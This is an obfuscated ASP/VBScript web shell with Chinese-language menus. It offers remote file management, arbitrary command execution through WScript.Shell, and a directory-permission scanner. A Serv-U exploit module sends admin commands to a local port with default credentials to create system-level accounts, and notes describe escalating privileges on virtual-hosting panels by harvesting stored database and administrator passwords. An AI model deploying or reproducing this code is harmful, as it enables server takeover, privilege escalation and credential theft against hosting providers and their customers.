n~1W9+@#@&]]UJ√E[q2lDt'hH0ksncxC:@#@&YWbVFR1VKd+@#@&nVk+@#@&"I?r@!0KxY,^GVKD{DnN@*×@!J0GxD@*Pr[ 2mYt'hH0rV lh@#@&Y0bVqR1VG/@#@&n NPbW@#@&?+D~O0bVFx1GO4kUo@#@&+ N~r6@#@&^Ck+~JyE@#@&jY,Y0bVq'w?qRKwnUD+6DWk^+`q2CY4[rJ':zWbVnR C:~qS #@#@&g+AZK[']w^lm`DWk^+qRM+C[mVVB mKN+BEE#@#@&U+OPG8NZGE OsbVnxqs?6 ;DnlDn:+aDsbV+vaCY4[hX6ksncxlsn~:DEb@#@&K4NZGEUOwks+c DbYn~g+h/G9+@#@&K8NZG!xDsk^+c/VK/n@#@&I]jr√J[q2lDt[szWk^+cxC:n@#@&?nY,G4NZG; Ysrs'HWD4bxL@#@&1l/PrfJ@#@&j+DPOWbV+8xsUFRK2nxD+XYWksnv2lD4[rJ'hH0ksncxC:S8~Ry#@#@&1h;GN']+aVC^`Y6rVFRMnCNmV^~ mG[~CN9/W9++b@#@&?nO,W8L;G!xOwk^+'qsU6R;DnlD+PnXYsbs+vwmO4[sX6ks+ Um:n~:.E#@#@&K4L/G!xOsbsR MkD+Pg+S/W9+@#@&K4%/KExDok^+R;sG/@#@&I]?E√EL2lD4[sXWr^+RUCs+@#@&UnDPG(L;WE YwrV'HWDtrUT@#@&1C/P+^dn@#@&I"?E错误RElM+dwKU/RnU9@#@&nU9Pd+^n1Y@#@&+^/+@#@&"]?r×PE[qwCO4[:HWk^+R Ch+@#@&x[PrW@#@&]IU~J,→P@!C,tDnW{B%l7Ckm.bwD)s!V^oWM:cJrJ'.wVm^+vwmO4[sX6ks+ Um:n~rwJBJwwr#[EEr~EJGGSxobVJJ*B,^Vm/d'Elhv,YkDs+{B下载B@*9Gh @!Jl@*PE@#@&I]?,E@!mP4.0'v%m\C/1.bwO=s!VVwWMh`rJE[M+2smm+v wmYtLhz0bVRUlhnBJwJBE-'Jb'rJJSEr2[kDobVnrJ*BP1Vmd/{BC:EPOrDV+{v编辑B@*+NbO@!zm@*,J@#@&]]UPE@!m~tM+WxELl-Ckm.kaO=s;^VwWDs`rEJLDnw^l^nv/YMq~r-JBEw-r#LJEJSErfnVwrVJEbEWx^sbmV'E.Y;Mx,X+kW0c#EP^Vm/dxEl:E~YbYVxv删除B@*fV@!zC@*,J@#@&"]?,J@!C,tDnW{B%l7Ckm.bwD)s!V^oWM:cJrJ'.wVm^+vwmO4[sX6ks+ Um:n~rwJBJwwr#[EEr~EJ;GaXobVJJ*B,^Vm/d'Elhv,YkDs+{B复制B@*/GwH@!Jl@*PE@#@&I]?,E@!mP4.0'v%m\C/1.bwO=s!VVwWMh`rJE[M+2smm+v wmYtLhz0bVRUlhnBJwJBE-'Jb'rJJSErHG\obVnrJ*BP1Vmd/{BC:EPOrDV+{v移动B@*HW7n@!zm@*@!4.@*E@#@&1n6D@#@&U+O~6/E8WKVnDk~{PWc?!4sKV9nDk@#@&sKD~3mmt,WF,kx,WdE(0KVnDd@#@&1nhhCY4' 2mYt'Er[WFcUm:n@#@&&x/DD)V^srV/~HhnmOtBmK[n~am@#@&H+aO@#@&d+D~Y6ksn{xWO4bxL@#@&jY~w?}P',1KOtbxL@#@&/nO,Y0bs+{xWD4rxT@#@&/nY~O6ks+yxxKY4r o@#@&jY~wj}Px,1KYtbxT@#@&Ax[PUE8@#@&sE ^KbWx,d;Gv#@#@&.+d2Kxd+cADbYnE@!0W.h,xC:xE0GM:8BPs+D4W9'vwK/Ov,lmDrW 'BE@*E@#@&D/2WUdRADbO+r@!2~mVkLU{B^+ ODv@*J@#@&D/aGxk+ hMkOnrOO RO OO RRO O OROjnM\Rj,(x6W.hmYkGU ORO R OR O OO O RJ@#@&.+kwGUk+RS.kD+J@!8.@*r@#@&Dn/2G /nRS.kD+E;k+DlE@#@&.+k2KxdRSDkD+r@!k w;Y,xCh'B9;/DB,Ozw'EYn6Ov,mslkd'EKnaDAWav,k['E[!/nMB,\l^ExBdW^l^b[hbxkkODmYWMv@*@!(D@*J@#@&.nkwGxknRSDrOJwA[,)E@#@&./2Kxk+RSDbO+r@!rxaEO~ l:xB9wh9v~YHw'vYnaDB~m^C/k'vP6Y$GXB~k9xEN2SNEP\mV!n'Eas@$flV:cV3pT@$hB@*@!8.@*r@#@&Dn/2G /nRS.kD+E2KDYlE@#@&.+k2KxdRSDkD+r@!k w;Y,xCh'B92WMYB,Ozw'EYn6Ov,mslkd'EKnaDAWav,k['E[aW.DB,\l^ExBW&1*RB@*@!(D@*r@#@&M+/aGU/RSDrYnE ORO RO ORR OORR ORO )9N~`/D"e",RO ORO ORR OO RO OO R@!A"@*r@#@&DndaWU/ hMkOnrfWhCbxlPLU(/2pPr@#@&M+k2W /nRSDrOJ@!bUw!YP Ch+{B9WhlrUEPOXan'EYnaDBP^sm/d'EP6O~WXBPbN{vNK:Ck B~-mVExBR!/^vPJ@*@!4.@*E@#@&Dn/aGxk+ AMkYnEwKKP`jAIlr@#@&D+kwKU/RADbYnE@!kxa;Y,xlsnxB6Ek+.B~OHwn'EO+XYv~1Vldd{BP+XO~WaEPbN'E0!d+MB~\mV;n{B%Zd+1B@*@!8.@*r@#@&Dn/2G /nRS.kD+Eo:nPK)U?lJ@#@&M+daW /+chMrYJ@!k w;O,xlsn'E0wmddB,YHwn'vO6OB,^Vm/dxEK+aO~WaB,r9'v6wm//EP7CV!+xB8 f*lvB@*@!4M@*J@#@&.+kwKxd+ AMkO+roKhPK6"K)E@#@&Dn/aG /nchMkYJ@!rxaEOP lhn{B0aGDDBPDz2+{BD+aYv~1VC/kxB:+aO~W6v~bNxB62KDOEP7lV!+{v 8B@*@!(D@*E@#@&DdwKx/ ADbYJoKK~hbPC=E@#@&DndaWxdnch.kDnr@!r w!YP lsn'E02lDtv~DXwxBD+6Dv~m^lk/xBPnXY$WXvPbNxv6wlO4EP-l^;'v1)'-B@*J@#@&D/2W /n SDkDnJ@!4D@*E@#@&M+kwGxdnch.kDnJhDr-bV+Lnr@#@&DdaWUk+chDbYE@!k+s+1Y~2mDl{-l^E+,UC:'Ew.k-r^+L+E@*J@#@&.nkwWUdRADbOJ@!KwDkW P7CV!+x @*InC9OW sX,bNsrU@!JWaYrWU@*r@#@&DdwKxdnchDrOJ@!WaObWU,\mVE'2@*MMW;w,b[hbx@!JGwDkW @*E@#@&D/2WUdRADbO+r@!G2DkWU~7lsExW@*9K:mkx,b9hk @!&WaYrG @*J@#@&D/wKUd+chMkO+E@!KwOkKUP7ls;'*@*jH/O+s~zNhbx@!zWaYbGx@*J@#@&M+d2Kx/ hMkYE@!zk+^+^Y@*E@#@&.+k2W /n SDkOnr@!&w@*E@#@&./aWxk+cADbYnJ@!w~C^ko xB1+xDn.B@*J@#@&.+d2Kxd+cADbYnE@!kx2;DPUlsn{B.mNbW4!YDGxEPOXa+xvMlNbGB,\l^;n'El9NvP^4mV+9~m^ldd{BKnaDAG6E@*r@#@&M+kwW / hMkO+rb[[,j/.Pr@#@&MndwKxk+ h.rD+E@!bUw!Y~OHw+xvMl[kKv,xCs+{BDmNbG4!YOW B~-mVExB9+VE~^Vm/k'vKnaDAG6E@*Pr@#@&./wGUk+ hMrD+EG+^Pjk+M~@!Jw@*J@#@&.nkwW d+chDbOnJ@!w,lskLU{B^+ O+MB@*E@#@&DndaWU/ SDrD+r@!k w!OP lh+{Bj;(:kDvPDXwxv/!4skOB~^^ld/{v4!YOGsBP-C^En'E]!xv,z@*J@#@&DdwKxd+ch.rD+J@!&w@*J@#@&.n/aW /nRA.bYnJ@!&0KDh@*r@#@&;dD~',.;;/DRsKDscJ9Ed+MJb@#@&wlkdP{PD5;+kYcsGDhcrN2h9E#@#@&2GMYPx~M+5EdDRoKDs`J9wK.Yr#@#@&9WhCbxP{~D;EdORwWM:cJ[Gslrxrb@#@&0;dDPx~M+5EdDRoKDs`J6EknDr#@#@&6wCdkP',.+$E+kO sKDs`E02Ck/E#@#@&0aW.O,'P.n$En/D wW.s`r0wKDDE#@#@&WwmY4~{PD5E/YcoGDs`r02lO4r#@#@&a.k7ksnT+'.n$En/D wW.s`rwDb\bs+T+E#@#@&dn^+mD~mm/+,2.k7k^+L+@#@&,P~mmd+, l@#@&PP2.b\rVL'E"+mNr VHE@#@&P~P1ldn,&)@#@&P,wDb-rVo'EM.G!wE@#@&~P,mCdPcl@#@&P~wMr7kso'JGWsCk J@#@&,P~^m/+,X)@#@&P,2.k7k^+L+xEUXdYhJ@#@&~~xN~dVnmD@#@&dr6PM+;!+kORwW.:vJ.C9kW(;YDWxrb~',JmN[J~P4+U@#@&sWTkU;k+D~x,Ji/.,J~LP!/+MPL~\(Z.S6@#@&sKok 2lk/P{~Enm/kPEP'~ald/,'P74/.d0@#@&hDPxPrj&K3,Hzq1:2g)1;2EPLP-8;DS6@#@& +h9Ghlbx,'~JRjAK9rt)qgJ~',\4/.d0~[,E fGslbx'rPL~NK:Ck P'E-!RZ !c!ur~'P6wKDOP'~ruRF-quZJ~',\4/.d0~[,E fz fg?2 l(s+{!EPLP-8;DS6~[,JP,9zx&nglh+xE,[~\(/Dd0@#@& +h;dD~',E ?3:jU2IU2:inrP'P74/.d0PL~J qn{T !c!c!EP'~74/DdWPLPERhWDOHK'EPL~6wGMY,[P74;.S6P'PrOidD'r'P6E/.~[,\(Z.SW~LPEOhC/khG.9'J~',02lkd,[~74;DS6PL~{@#@&~P,P~~,PJ uWs+fb.xJ,[,02lO4,[~\(/Dd0~',JOJGTkUHdwks'rP[,\(/Dd0~[,JR9b/l(s+{!J,'~\(ZMSWP'~rO]+^KlDtdx8JP'~74/DdW,[~|@#@&PP,P,~P,JR1+[jmEMn'ZJPL~-4;Dd0~[~E CrNuk9NnU{!J~',\8ZMJ6P',J bVSlHdb^VGhdWLr '!r~[,\4;.J0,[,JRZ4C onnmd/SW.[{!J~',\8ZMJ6P',{@#@&P,P,~P,PEO5EGOm2xm8V'!r~'P74;DJ0~',JRHmajk+.ddWorUh+.qhx FE,[,\4;DdWPLPEOUwnn9SksrY`w'ZE~[,\(Z.SW~LPEOU2+NJrskY9GSxx!r~LP-(ZMS0,[,m@#@&P~P,P~~,JOtC6gDjkn./{O8J~[~-(Z.S6~[,JR(9V+Prs+6EDx+!TrPLP\(ZMJ0,[~J ?ndkkW Pks+r!OxO8J,[~\8/MSWPL~J 2a2bD+xTrP'P78;DJ6PLPJ ImOkKj2'8J~',\4;.S6P[,m@#@&,P,P~P~~rO]lDrWGWAU{FJ~',\8ZMJ6P',J IlDkKdZM+[kD'TE,[P78ZMS0,'~J p!WOl/;MDnxDx!rP'~74Z.J6P'PrR5EGDltl6b:!h'ZJ~[,\8/MS0,'P|@#@&,~~P,P,PEO\CbxO+ Cx1+xE,[P2.b\rVLP~LP74ZMS6~[,JRnm/dAKDN:zw'IL;VmDrP'P-8;DJ0,'PrO]CDkWdxgWU+r~LP-(ZMS0,[,EPzm^+k/xE,[P62lDtPLEkIqbt2JZ9KrP'P78ZMSW@#@&;ErO,'~J5i&KE,[,\4;DdWdi@#@&diBRR OO RO@#@&div6x,2MDGD~]/;:~16O@#@&ddjnDPanKdDPx,ZM+lD+}8LmO`rHr^MW/KWYc(HduPKhJ*@#@&d7ahWdYc6wx~Ehr?PEBPEtDOa)&JFyGRZRZ F=J'PaW.O,[JJd+1N/DESKME~~JES,JE@#@&7dXnGdDR?nU9PsWTr EdD,[P^WTrxald/,[~hDP[,U+SNWsCrx,[,xnh;dD~[,5EbY@#@&id?nO,6KWkO,'UKY4kxT@#@&7dM+dwKxdnchDbO+,J@!9r-PmVboU'E'1t.`2*P*[E^xYn.r[^tMc2c~*[r@*s:n,;/D~JL0;dD[r~Pal/k~E[6wm/d[E~mY~wK.Y,J'~6wW.O,[E@!J[b\@*r@#@&d+^/r0,Dn;!+dOcsWMh`rDl9rG4!YDWUJb~{PENsJ,K4n @#@&7@#@&d7VKLbx;k+MP',J`d+MPEPLP;dDPL~\(ZDdW@#@&id^WLkU2m/dP{~Jhldd,JP'~ald/,',\8;Dd0@#@&dihY,'~JUqP3,Hb&HKA1bg/3J,[,\8Z.J6@#@&di[+^EdnMP'~~rO92d3:2iU2"JPLP78mMVWPLPER&n'Z !c!RZE~[,\(m.VW~LPEOhGDD1GxrP[~2KDOPL~74^MV6P[,J,i/DxJLPW;k+D,'P74mMsW@#@&di;;kO~{PEp`(KrP'~74Z.J6d@#@&i7U+O,6hW/D&,xP;DnlD+68N+mDcJt?(tJ+RoHdCPKKE*@#@&dianK/OfcrwnU,JKrUPr~~rtDYw=zJq FRTRZRqlr[PaGDDP[r&d+1NkYE~~PMEn@#@&7dXnGdD&Rjn N~VKLbx;k+MP[,VKLk wC/kP'~sYPL~NVEkn.PLP$ErY~@#@&d7?OPXn6j:&'UGDtrxT@#@&d7M+kwW / hMkO+,J@![b\PmskTx'r'^tM`2c~#'E1+UY.JLm4.v&c~bLJ@*s:K,EdD,J[6EknDLJ~Paldd,J[62lk/[r~CY,wKDOPE',02WMOPLJ~4m\+~[VnY[@!z[b\@*J@#@&ds/@#@&diDndaWxknRSDkDn~J@!Nb\~lsrTxxJL^tM`f*,#[E^xO+MELm4M`2cP*[r@*VYv/,?OCMY"eZ@!JNk7@*E@#@&dx[PrW@#@&nx9~0!x^ObWx@#@&wEUmDrKx~6E.tED;8c#@#@&]IUJ@!2@*@!mUYD@*=星外虚拟主机辅助提权l@!za@*@!mnxOnM@*E@#@&]IUJfZ杀毒N4文件替换l@!(D@*J@#@&"Ijrm=-nMWT.lsPok^+dw2v!'fvZ?f'[n+a/1lU-jn1YrW w:!YnacN4~@!(D@*Pr@#@&I]UJ1)-hDKLDm:~sbVnd'&vZw&+!?mWn-9+wdmCU'?nmDrW -h;D+6 [(P@!4M@*r@#@&"IUJZ=-h.WTDC:,srs/-2!'&vZjC0-zxOkjn1YrW w:!YnacN4~@!(D@*J@#@&"Ijrs^l/4文件替换)@!8D@*J@#@&"IjE;)-q(1GrUwdXkY:f w\mm.WsnN'ssCkt-osm/4FZ5cW^XP@!4D@*J@#@&I"?Eq&?.nSDkDn&,文件替换:@!4M@*E@#@&I"?EZlwhDGoMC:,srs/-un^k^W w&?)hq|I+SDbO+2-]+SDrORVKL@!(D@*r@#@&I"?rZl-K.Ko.ls~sbVnd'C+sr1WU-&jzn(|IhDbYf-4YOw9R^G 0@!(.@*r@#@&"]jJ;)'n.WL.m:~sbs+k-un^kmGU'qjbh(|InSDbY+2-.DKD VKo~@!(D@*r@#@&"I?r9iPt+D+.流量统计信息日志文件替换:@!8.@*PE@#@&]IUJ^l'fW^;s+UYk~mx[,?YYbxTd-zVsP`/n.k-ba2VbmlDrGx,fmYC-uCT+sP:nm4xGsKoknd'fiPtnD+.'VKoR1/7~@!(D@*J@#@&]]UJ诺顿杀毒文件替换)@!8D@*J@#@&]]?rm=-KDGLMlhPwrV/w/K::GU,srVd'?zsl Y+1PU4lM+[-h+.db/Yc8l0P@!(.@*J@#@&"IjJ^l'n.WT.lsPor^+/w/K:hW ~wks/'?Xsl O+1PjtmDn['.l^rNmY+c[CY,P@!4.@*E@#@&I]?r^)'n.GTDlh~wks+kw;WhsW PsbVd-UXhl Yn^,?tm.+9-n.dkkYcfCY~~@!4.@*r@#@&"IjE华盾文件替换=@!4.@*r@#@&I"jrZl'&1f}Uwt1tr4^kd b4V,@!4M@*J@#@&]IUJ一流过滤相关目录及文件:,@!8D@*E@#@&]IUEZ=-{rycR^Gs-rkkdm0n'VKo-kYm.Ymx[kb/^4m3cO6DPP@!8.@*r@#@&I]?E/=-{ky*R1Whwbk/dC6+wVKL'/^mx^WoctDhP,P@!4M@*E@#@&IIUE其他相关)@!4D@*E@#@&"IUJt+U[=P/)'KDKo.CsPsrs/w}U9-tx9rwDksryDR&c& T'Vk(wraYksr"+MO2RfRTwat2Ol c6wtxN62Dkhk.nMR[^V,P@!(D@*E@#@&I]?rZlwGWm!h+ Y/,CUN,?YOkULk-)V^~jk+.d'bw2sbmCYbG P9mYm-HbmMG/K0O-t+[rmPq [+X-P,@!8D@*J@#@&]IjEh/l星外提权方法通用于各虚拟主机系统@!(.@*r@#@&n NPW; mOkKU@#@&o!x1YkKx,WE.t;Y$ cb@#@&I"jJ@!w@*@!^nxD+M@*l华众虚拟主机辅助提权)@!&a@*@!mUYD@*E@#@&I]jrF|m=wSkU9WS/-D+s2下有t.tG/D主机留下的0O2登陆记录7有用户名和密码@!4M@*J@#@&I"jE @$找:k/5V~dm密码~hXk5V,DGGD密码及/+.- E的CNsr kdDDmYWM密码@!(.@*r@#@&I"?EhH/;^~DKWY密码:_F35|S}Z)Sm\zZuqg3-kWWOSlDnw4y4WkO'mG 0bo-k+DOk od-sXd5^wlkdP@!4D@*E@#@&"IUJd;sdD-+M~/m密码:CF3I{S6/zSmHz/_qHA-kW0Dhm.+'t"tK/Ow1Wx6ro'/+DOrxT/':C/OnM/-DaC/k@!8.@*J@#@&]"?E?.7O;管理密码:_|A5{dr;)S|H)Z_qH3'/W6OhmD+'4"tK/D-^WUWbow/OYbxLd'/\.2m/d@!(.@*J@#@&I"?J以上信息配合4y4G/D/华众虚拟主机系统RXP破解数据库密码工具使用@!8M@*J@#@&I"?J下载地址:百度搜索,v4y4WkYd华众虚拟主机系统v a,破解数据库密码工具B~@!(.@*r@#@&]"?JKd=星外提权方法通用于此虚拟主机系统@!8D@*E@#@&n N,0E mDrW @#@&s!x^ObWx,WE.tED5f`*@#@&I]?E@!a@*@!mUYD@*lg点虚拟主机辅助提权)@!&2@*@!^+ OD@*r@#@&IIUJ默认数据库下载:@!8D@*J@#@&"IjE8R,版:4G/D{NmOnzu 2tG/OYy!Y 2Y ZNCO] f sN8@!(.@*J@#@&I"?J8RO版:tK/O{9lOnJ] 24WkY]yTY 2]y![lOnu fFORsN8~@!4D@*E@#@&]IUE具体方法:通过星外相同方法读&qjB然后跨站到1点管理站点目录下,接着通过上述地址下载回得到的kl和:H/$s及站点的其他信息的3X,通过下面的代码解密:@!4M@*E@#@&BI"jJ地址=需更改处J@#@&]]?rnk)星外提权方法通用于此虚拟主机系统@!4.@*r@#@&+ [P6EU^DkWU@#@&s;x1ObWU,0!yt!Y$*`*@#@&I"?E@!6WxD~mKVWMx:!Zsw!T@*请等待程序更新+3G@!&0KUY@*J@#@&xN~W!x^YbG @#@&wE mYbW ~0!y4ED;Xc*@#@&bWP"+;!ndYvJhlOtdE*PxJr~Y4+U@#@&nlO4k{dYMxrml'hbxNKhkwJLm4DvFfbLmtMcFZ#[r^l-GW1Eh+UOkPCx9~?YOr o/wELm4Dvq2#'1tM`FZ#LEm=-KDKo.CsPsbs+k-J@#@&r0,?/dkGUvJ2lD4/r#@!@*rJPO4x~PhCDtd|/DD'U+kdkKxcJalO4kJ#@#@&d"+/aGU/RqDrYn~r@!WWMhPbNxv6WDhqEPUlsn{BWKDsFB,:OtKNxBaWdOEPl1OkKx'Ev@*J@#@&iIn/2G /nRq.kD+~E此程序可以检测你服务器的目录读写情况B为你服务器提供一些安全相关信息"@!8.@*输入你想检测的目录~程序会自动检测子目录@!4M@*rd@#@&d"+/aW d+c.kD+~E@!Y+XOlM+l,UC:'EnCY4dEP^W^d'E%Tv,DWAd{Bq!E~1VCk/{B29kDv@*r[KlDtdmkYDLE@!JY+XOCDl@*J@#@&7]/2W d+c.rD+PE@!(D~z@*E@#@&7"+kwW / MkO+,J@!r wED~YHw+{vdE(:bYvPUCs+xB(;YDWUv,\ls;'v开始检测B,&,msm/k'B(EDqB@*J@#@&iIndaWxknRqDkDn~J@!Vm4nV~WKDxB;4+13HnXYfr.E@*E@#@&7"+daW /+cMrYPE@!bx2;DPxmh+{BZ4n^3g+XY9k.v,YzwxB1tn^04Wav,k['E/4+^016YGkMvP1tnm0+[xEmt^3NB,&@*测试目录P,J@#@&7IndaWU/ MkOn,J@!&sm4nV@*E@#@&7"+kwW / MkO+,J@!sm4+^~0KD'E/4+13wks+v@*r@#@&d"n/aWUdR.rD+~J@!r w;DP l:'E/tmVsbVnv,YXan'Emt^V4K6EPrNxv;tnm0ok^+v~1t+^VNxB14mVNEPPJ@*测试文件r@#@&iIn/aWUdRMrYPJ@!&sl(+^@*E@#@&7"+dwKU/R .bY+~E@!VC4s,0GM'E?tKhgGMkO+E@*E@#@&dIdwKx/ DbYPE@!rUaEOP C:'vj4WhHGqDrYv,Yza+{Bm4+1V4K6vPbNxvUtWSHWqDkDnvz@*J@#@&7IndaWU/ MkOn,J显禁写目录和文件@!&sm4nV@*E@#@&7"+kwW / MkO+,J@!sm4+^~0KD'EHGZ4+13P+h2E@*E@#@&7I/2G /+ MkO+,E@!kUaEDPxm:xBgW/tmVP:wE~YHw+{v^tm04G6v~bNxBgGZ4+^V:+:2v,m4+1VNxEm4+m0+9vPJ@*E@#@&d]nkwW d+cDbOnPr不检测临时目录@!JVC4ns@*J7@#@&7I/2G /+ MkO+,E@!zWKDs@*J@#@&s/@#@&I/2G /+c DbY+,~E@!mP4Dn0xErgEJ@*重新输入路径@!zm@*@!8M@*J@#@&;tnm0obVn,',`I;!n/D`EZ4+^VwkVE#{JW Eb@#@&Z4+^3HnXY9kM~',`]n$E+dOvJ/t^01nXYGkDr#{EW Jb@#@&?4GS1Wq.kD+fb.~',`"+5EndD`E?4GhgW .bY+Eb{JGxrb@#@&HKZ4+m0Khw,'~`"+5;/YvE1KZt^VK:aJb'EG Jb@#@&]+kwGUk+R .bYnPr检测可能需要一定的时间请稍等 cR cR@!4D@*J@#@&D/2W /n wVEk4@#@&@#@&Und/bW `EwCO4/E#,xP"+5;/YcEhlOtkE*@#@&@#@&hlY4/U2VbYx?aVrOvI+$;+kY`rKCY4/r#Sm4.vFf#L^tM`qT*#P@#@&wW.PbxdAG!x9`nmY4d?aVrY*PPG,jAK;x9`nmO4/Uw^kO#~@#@&kWPbU/DDcKmYtdjaVrYvr*~E=J*@*!,Y4nx@#@&7?4WA9bDMrY{fb.msbVPPDrhvnCY4d?aVrOvk#bS;tnm0obVnBZ4+m01aYGk.@#@&2U[,q0,@#@&g+6D@#@&I/aWU/n qDrY~J]扫描完成T@!8M@*J@#@&x[PbW@#@&n N,0E mDrW @#@&s!x^ObWx,^:9 `*@#@&D/aWU/n SDrYE@!6W.h,:+O4KNxBaGkYv@*J@#@&D/aGxk+ hMkOnr@!k 2EDPYH2n'D+XY~xCh'vms[B,/r"'vT@*r@#@&DdaWUk+chDbYE@!bx2EDPOza+'k;4skY,-CV!+{B.EUv@*@!&0K.:@*PE@#@&D+d2Kxd+cAMkOJ@!Y+XYm.+mP.+mNGU^XP1GVk'%Z~.WS/{ T@*~E@#@&.+k2W /n SDkOn,/nD7nMR^M+mY+K4NnmD`Ehkm.raYRk4+^VJ* n6mvJ^:[ 6nPJ^Pr[.n$E+dOc0GDscrmh9J*#RkY9GEDR.+mNCs^@#@&Mn/aWxkn hMkD+E@!&O6OlMnl@*J@#@&xN~W!x^YbG @#@&wE mYbW ~/!0Owv#@#@&"I?r@!w@*@!mUO+M@*集成版本信息=@!&w@*E@#@&]IUE@!6W.h,xlhn{BWWMh8B~s+DtW9'E2WkYvPmmOrKx'Ev@*r@#@&"]jJ@!mxO+.@*管理员=@!rxa;Y,xCh'B[;k+.B,OHwn{BD+6DB,^Vm/d'EKnaDAWXvPbN'E[;/DEP-ls;'vSK^l^b[hbxkdOMlOWMv@*@!8M@*r@#@&"IUE@!1+UYD@*管理员密码~=@!k 2EDPxmhn'ENah[B~OHwn'EO+XYv~1Vldd{BP+XO~WaEPbN'ENaANEP-l^EnxEaV@$yl0aR^VI!@$nE@*@!4.@*r@#@&I"jJ@!mnUD+D@*jAI#O`端口l@!kUaEDPxm:xB9wGDDB~OHw+{vY6YE~^Vm/k'vKnaDAG6E~k9'v[aWDOv,\CV!n{B*2,l%B@*@!(.@*r@#@&I"?E@!1+xDnD@*添加的用户名)@!bU2EDP lh+xvDEd+MvPDX2n{BYnaDB~m^Ck/xEK6Y~WXvPbNxBDEdnMBP7CV!+'Eqv@*@!4M@*E@#@&]"?E@!1nxD+.@*添加的用户密码=@!kU2!Y~xmh'vDwm//EPDzw'vY6Ov,mVmd/{BKaOAK6EPrNxvald/E~\mV;n{BFv@*@!4.@*r@#@&I]UJ@!m+ Y.@*帐号的所对的路径=@!rxaEO~ l:xBDwlD4vPDXa+xBOnXYvP1slk/xv:+6O$K6vPb[{BOalDtB,\msE'vZ=-v@*@!4D@*E@#@&IIUE@!mxD+.@*服务端口l@!bx2ED~xm:nxEYwG.DB~YH2'vD+XYB,m^C/k'vK6O$K6B,rN{BYaG.YEP7lsEnxE qB@*@!4M@*E@#@&IIjE@!mnxDnM@*@!bxaEY,xmh+{B.l9kG8!YYKUB,YXanxBMl9kGB~-mV;+{vl9Nv~1t+^VN~m^Ck/xEK6Y~WXv@*确定添加r@#@&I"?E@!1+xDnD@*@!k 2;Y,YHwn'v.mNrWE~xm:nxEDl[rK4;YDG B~7l^E+{B9nVEP^Vm/dxEK+XOAK6B@*确定删除E@#@&"IUJ@!w@*@!bx2ED~xm:nxE?E8hbYvPDza+xE/!4:bYE~m^ld/{B8;DYWsvP7lV!nxB提交E@*@!z2@*@!&6W.:@*E@#@&jd.,'P.n$En/D wW.s`rNEk+ME#@#@&2h9Px~M+;!n/DRsK.h`rNah[Jb@#@&wGDD~',Dn5!+/O wW.:vE9wGMYr#@#@&Y!d+MPxPM+5;/YcoWM:`rO;/Dr#@#@&O2m/dP{~D;;nkYRoGM:cJD2m/dr#@#@&YalD4P{P.+$EndDRsK.:vJYaCOtr#@#@&OwG.DPxPMn;!+dOcsW.hvJOwK.DJb@#@&EZWs:mUN,'~D;;nkYRwGDs`J9^hNr#@#@&r0~.;;+kORwW.hvJDC[bW8EDOKxE*P{PJmN9EP:tnx@#@&snm\+k~',Jjkn.PrPLPi/.~LP-41.V6@#@&sl\nd,'~VC7+d,[,Jnm/k~J,[~wSN~',\41.V6@#@&^nC\/,'~VnC7+dPL~JUqP3,Hb(H:2Hbg/AJ~LP74mMV6@#@&EVnl7+d~{PVC\/PL~EOU2:f6H)(gJ~[,-41DsW,[PERGWhlbU{m^D\-!RZRZ !-cf%l,kR8uF-TJ,[P78^D^0,[~JRP\r3xm8V'TE,[P-81Ds0,',J~:}}|+H'r~[,\8mMVW@#@&V+m-+kP',snl7+kP'PERU2PjU3IU2PihJP'~74^D^W,[~rO&n'ZRZ !c!EPLP-81DV6~[,JOhG.YgW{J~[~OaW.Y,'P74^.^0P'~rOi/.{J~LPDE/D,'P74^D^0~',JOhC/khWM[xJ,[,Y2ldd,[~\(^D^0~',{@#@&E CG:9bDxrPLPYalD4PLPE-rP'~74mMs0,[PrRJWTk Hn/or^+xJ,'P74^.^0P'~rO9kkC(Vn{!rP[,\(^D^0~[,JR]VnmOtk'Fr~'P741Ds0~',{@#@&rR1+[jmE.n{!EPL~74^MV6P[,J uk9+uk9NnU{!J,'P74mMsWPLPrO)VACH/)V^GhdWLr '!E~LP-41.^0~LPrOZ4l L+hld/SW.[{!J,'P74mMsWPLP|@#@&JR}!WOlAUl(VnxZJP'~74^D^W,[~rOtl6`/./dWLk nn.&n' qJ,[P78^D^0,[~JRja+nNdr:bYi2{!J~',\8mMs6P',J ?w+9JkskOfKhUxZJPL~\(mD^W~[,{@#@&EO\CX1.jknDk'RqrP[~-(m.V6~LPE q9V+:ksnr!YxvZ!E~LP\(^D^0PL~EOU+k/rWUPb:nr!O' FE~LP\8^MVWPL~rO3XwbD+{!r~[,\8mMVW~LPJ ]lDkW`2xFrPLP-4^.^0~[,m@#@&JR]mYkG9KhU'8E,[~741DV6PL~J ICYbWd/M+NbO'ZJPL~-41D^0~[~E p;WDCZ!D.n Y'TE,[~\(^MVW,[,JO5EKOltlaksEhxZJPL~\(mD^W~[,{@#@&EO\CbxO+ Cx1+xjH/YnhrP'P781Ds6PLPJ nmd/SW.N:X2n{I+T;VmDJ,'~\(mMVWP'~rO]lDrWk'HG +J~',\8mMs6P',J,bm1+kd'rP'PDwCO4P[,E--Iz\3S;fhJ~[~-(m.V6@#@&EVnC7+/~x,Vnl7nkP',J$EkDJ,'P74^D^0@#@&EOO RO OO@#@&6x,2MDGD~]/;:~16O@#@&?+O~XnG/D~{P/M+mY+}4NnmD`EHU(\JyR(tJC:Knrb@#@&XnK/OR62x~Jh6?:JS~rtYO2=z&Fy{c! ZR8)JLPaGDDP'JJVnC7+/rSP:DE@#@&6hWkY ?nU9`s+m-+k#@#@&U+Y~ahrjK{UKY4bxT@#@&"IU~`r命令成功执行!!sPn,用户名)~E,[PD;/DPL~EPrPLPE密码)~E,[~YaC/kP'~rP路径)~E,[~YaCDt~LPrP)*@!(.@*@!A]@*r#@#@&V/@#@&^+l7ndP{Prjd+.~rP'P`dD,[~-(mDsW@#@&s+m-/~{P^+l7+k~[,JKlk/~E,[PaAN,[P78^D^0@#@&s+C-/~',s+m\nd,[PEj&K3Pt)&1PA1z1ZAJ,'P74^D^0@#@&^+l7n/,'P^nC\/,[~JR9AS3KAi?AIE~LP\8^MVWPL~rO(h'ZR!c!cTJ,[~\(m.s6P[,EOhWDDHG'rPLPOwG.DP'P78mMVW~LPJ~ik+.'r~LPO!/DPLP78mMVW@#@&?nO,6nKdY2P',/.+mYr8Ln^D`EHUpHd ptSCPPhJb@#@&ahWdD&crwx,En}?PJBPE4DYw=&z8 GcT !cF=J'P2GMY~[r&Vl-nkJ~~PMEn@#@&ahWdD&c?+ Nvs+m\n/*@#@&jYPXKrUK&{UGY4k o@#@&]]UPE@!6GxDP^G^WDx:60W06W@*rF}|}|@!J0KUY@*@!8D@*@!$]@*J@#@&nx9Pk6@#@&2 